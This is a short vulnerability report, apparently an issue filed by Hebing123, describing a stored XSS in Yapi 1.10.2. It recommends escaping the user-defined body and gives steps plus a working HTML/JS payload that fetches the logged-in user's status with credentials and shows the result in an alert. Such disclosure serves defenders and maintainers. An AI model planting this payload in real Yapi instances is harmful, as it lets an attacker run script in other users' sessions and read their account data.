yapi 1.10.2 (2021-10-13) has a stored XSS vulnerability

[Hebing123]

Summary

A stored XSS vulnerability exists in Yapi 1.10.2 (2021-10-13) which allows attackers to execute arbitrary HTML code.

Details

In the advanced expectation, the user can execute any html code, which is not allowed because of the same origin relationship, we can attack any user present on the system through the vulnerability.
Therefore, the ideal solution is to filter and escape the user-defined body field.

POC

1. Register and log in to your account, create a project, and add an interface.
   
2. Choose "Advanced Expectation - Response."
   
3. Modify the body to:

<!DOCTYPE html>
<script>
    fetch('https://your-ip/api/user/status', {
            method: "GET",
            headers: {
                "Accept": "application/json"
            },
            credentials: 'include'
        })
        .then(response => response.json())
        .then(data => {
            alert(JSON.stringify(data));
        })
        .catch(err => {
            console.error('Error:', err);
            alert('Occured an error while fetching data');
        });
</script>

Visit your Api Url, such as https://localhost/mock/4089/test